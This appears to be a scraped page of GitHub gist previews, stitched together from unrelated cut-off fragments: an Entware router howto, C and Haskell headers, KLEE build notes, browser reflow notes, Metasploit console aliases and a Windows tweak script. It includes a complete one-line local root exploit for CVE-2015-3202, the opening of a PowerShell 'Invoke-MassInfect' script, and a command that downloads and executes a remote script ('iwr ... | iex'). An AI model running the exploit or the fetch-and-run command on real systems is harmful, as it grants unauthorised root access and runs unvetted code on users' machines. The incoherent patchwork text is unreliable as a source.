This howto describes installing entware for the Tomato open-source router firmware.
- USB stick - 1G or more in size
- USB-capable router running TomatoUSB.
| #include <windows.h> | |
| #include <stdio.h> | |
| #include <WinInet.h> | |
| #include <ntsecapi.h> | |
| void writeToLog(const char* szString) | |
| { | |
| FILE* pFile = fopen("c:\\windows\\temp\\logFile.txt", "a+"); | |
| if (NULL == pFile) | |
| { |
| import System.Directory | |
| import System.Environment | |
| import System.FilePath | |
| import Control.Applicative ((<$>)) | |
| import Control.Arrow (first, second) | |
| import Control.Monad (void) | |
| import Data.Either (rights) | |
| import Data.List (isSuffixOf) | |
| import Data.Set (Set, (\\), empty, fromList, insert, singleton, toList, union) | |
| import Text.Parsec |
This howto describes installing entware for the Tomato open-source router firmware.
| # These are instructions for how to build KLEE and mcsema. | |
| # These are a part of a blog post explaining how to use KLEE | |
| # to symbolically execute closed source binaries. | |
| # install the prerequisites | |
| sudo apt-get install vim build-essential g++ curl python-minimal \ | |
| git bison flex bc libcap-dev cmake libboost-dev \ | |
| libboost-program-options-dev libboost-system-dev ncurses-dev nasm | |
| # we assume everything KLEE related will live in ~/klee. |
| # These directions will: | |
| # 1. Build a binary version of the Symbolic Maze by Felipe Manzano | |
| # 2. Convert the binary to LLVM bitcode with mcsema | |
| # 3. Optimize the resulting LLVM bitcode | |
| # | |
| # These same actions are done by | |
| # ~/klee/mcsema/mc-sema/tests/demo_maze.sh | |
| # if you would like to run them automatically | |
| cd ~/klee/mcsema/mc-sema/tests |
| # Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet. | |
| 12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890 | |
| a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202 | |
| # Here's how it works, $a holds the name of a shellscript to be executed as | |
| # root. | |
| a=/tmp/.$$; | |
| # $b is used twice, first to build the contents of shellscript $a, and then as |
| function Invoke-MassInfect | |
| { | |
| <# | |
| Inspired by Chris Campbell's WMIS command encoder | |
| https://github.com/obscuresec/random/blob/master/EncodeShell.py | |
| CIDR Parser from Matt Graeber's Invoke-PortScanhttps://github.com/mattifestation/PowerSploit/blob/master/Recon/Invoke-Portscan.ps1 | |
| https://github.com/mattifestation/PowerSploit/blob/master/Recon/Invoke-Portscan.ps1 | |
All of the below properties or methods, when requested/called in JavaScript, will trigger the browser to synchronously calculate the style and layout*. This is also called reflow or layout thrashing, and is common performance bottleneck.
Generally, all APIs that synchronously provide layout metrics will trigger forced reflow / layout. Read on for additional cases and details.
elem.offsetLeft, elem.offsetTop, elem.offsetWidth, elem.offsetHeight, elem.offsetParent| set PROMPT %red%L %yel%J %grn%S %blu%W | |
| load nessus | |
| load pentest | |
| load sounds | |
| load alias | |
| alias j "jobs -v" | |
| alias s "sessions -v" | |
| alias -f w "workspace" | |
| alias so "show options" | |
| alias sa "show advanced" |
| ### | |
| ### | |
| ### UPDATE: For Win 11, I recommend using this tool in place of this script: | |
| ### https://christitus.com/windows-tool/ | |
| ### https://github.com/ChrisTitusTech/winutil | |
| ### https://www.youtube.com/watch?v=6UQZ5oQg8XA | |
| ### iwr -useb https://christitus.com/win | iex | |
| ### | |
| ### OR take a look at | |
| ### https://github.com/HotCakeX/Harden-Windows-Security |